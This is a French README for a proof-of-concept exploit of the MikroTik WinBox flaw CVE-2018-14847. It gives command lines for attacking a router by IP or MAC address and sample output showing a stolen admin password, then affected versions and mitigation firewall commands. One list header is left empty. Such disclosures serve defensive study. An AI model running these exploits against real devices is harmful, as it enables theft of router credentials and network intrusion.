
Preuve de concept de la vulnérabilité critique de Winbox (CVE-2018-14847)
Ceci est une preuve de concept de la vulnérabilité critique WinBox (CVE-2018-14847) qui permet la lecture arbitraire de fichiers contenant des mots de passe en texte clair.
Ce script ne fonctionnera PAS avec Python 2.x ou version inférieure.
Le script s'utilise simplement avec des arguments simples en ligne de commande.
Exploitez la vulnérabilité et lisez le mot de passe.
python3 WinboxExploit.py <IP-ADDRESS> [PORT]
Exemple :
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord
Vous pouvez extraire des fichiers même si l'appareil n'a pas d'adresse IP.
Vérification de découverte simple pour les appareils Mikrotik connectés localement.
python3 MACServerDiscover.py
Exemple :
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)
aa:bb:cc:dd:ee:ff
aa:bb:cc:dd:ee:aa
Exploitez la vulnérabilité et lisez le mot de passe.
python3 MACServerExploit.py <MAC-ADDRESS>
Exemple :
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
User: admin
Pass: Th3P4ssWord
Toutes les versions de RouterOS du 2015-05-28 au 2018-04-20 sont vulnérables à cette exploitation.
Appareils Mikrotik exécutant les versions RouterOS :
Pour plus d'informations, voir : https://blog.mikrotik.com/security/winbox-vulnerability.html
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
/tool mac-server mac-winbox